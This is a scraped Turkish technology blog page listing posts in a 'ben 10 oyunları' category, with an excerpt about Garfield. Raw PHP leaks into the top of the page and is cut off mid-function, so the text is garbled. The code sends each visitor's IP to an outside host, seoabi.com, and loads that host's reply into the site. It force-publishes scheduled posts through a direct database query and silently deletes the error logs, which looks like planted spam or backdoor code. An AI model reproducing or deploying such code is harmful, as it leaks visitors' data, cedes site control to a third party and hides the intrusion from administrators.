$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> ben 10 oyunları | Teknoloji Haberleri

ben 10 oyunları kategorisindeki tüm yazılar

Son Yazılar

FUTBOLCU GARFİELD

Garfield, 1970li yıllarda Amerikalı bir çizgi film yapımcısı tarafından hazırlanmaya başlamıştır. 2000li yıllara gelmemize ve ilk ortaya çıkışının üzerinden 40 yıldan fazla geçmesine rağmen popülerliğini kaybetmek bir yana dursun, gün geçtikçe daha da çok sevilmektedir.  Garfield’ı bu kadar çok sevmemizin nedeni belki de bu şirin kediyi kendimize